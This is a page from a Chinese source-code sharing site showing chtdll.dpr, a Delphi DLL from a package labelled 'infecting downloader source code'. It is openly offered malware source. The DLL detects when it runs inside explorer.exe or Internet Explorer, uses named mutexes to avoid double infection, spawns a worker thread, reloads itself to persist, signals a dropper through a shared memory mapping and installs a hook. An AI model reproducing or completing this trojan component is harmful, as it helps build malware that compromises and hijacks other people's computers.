chtdll.dpr

来自「感染下载者源码 感染下载者源码 感染下载者源码」· DPR 代码 · 共 57 行

DPR
57
字号 
library  chtdll;

uses
  Windows,
  Messages,
  hs,
  cttt,
  rett in 'rett.pas',
  kttv in 'kttv.pas';

exports
  Hookon, Hookoff;
  
var
  PMainThreadID: PDWORD;
  MutexHandle, FileHandle, SubThreadID: DWORD;
  ModuleFileName: array [0..MAX_PATH] of Char;

begin
  GetModuleFileName(0, @ModuleFileName[0], MAX_PATH);
  if CompareAnsiText(ExtractFileName(ModuleFileName), 'explorer.exe') then
  begin
    MutexHandle := OpenMutex(MUTEX_ALL_ACCESS, FALSE, 'gg_dll');
    if (MutexHandle <> 0) then
    begin
      CloseHandle(MutexHandle);
    end  
    else
    begin
      CreateThread(nil, 0, @ThreadPro, nil, 0, SubThreadID);
      GetModuleFileName(HInstance, @ModuleFileName[0], MAX_PATH);
      LoadLibrary(@ModuleFileName[0]);
      FileHandle := OpenFileMapping(FILE_MAP_ALL_ACCESS, False, 'gg_file');
      PMainThreadID := MapViewOfFile(FileHandle, FILE_MAP_ALL_ACCESS, 0, 0, 0);
      PostThreadMessage(PMainThreadID^, WM_QUIT, 0, 0);
      UnmapViewOfFile(PMainThreadID);
      CloseHandle(FileHandle);
      hookon;
    end;
  end;
  if CompareAnsiText(ExtractFileName(ModuleFileName), 'IEXPLORE.EXE') then
  begin
    MutexHandle := OpenMutex(MUTEX_ALL_ACCESS, FALSE, 'gg_ie');
    if (MutexHandle <> 0) then
    begin
      CloseHandle(MutexHandle);
    end
    else
    begin
      CreateThread(nil, 0, @ThreadPro, nil, 0, SubThreadID);
      GetModuleFileName(HInstance, @ModuleFileName[0], MAX_PATH);
      LoadLibrary(@ModuleFileName[0]);
    end;
  end;

end.

chtdll.dpr - 源码说明

本页面展示了「感染下载者源码 感染下载者源码 感染下载者源码」中的 chtdll.dpr 源码文件,采用 DPR 编程语言编写,共 57 行代码。您可以在线阅读完整代码内容,也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫开发者社区收录了大量与源码相关的技术资源,包括源代码、技术文档、电路图等,是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?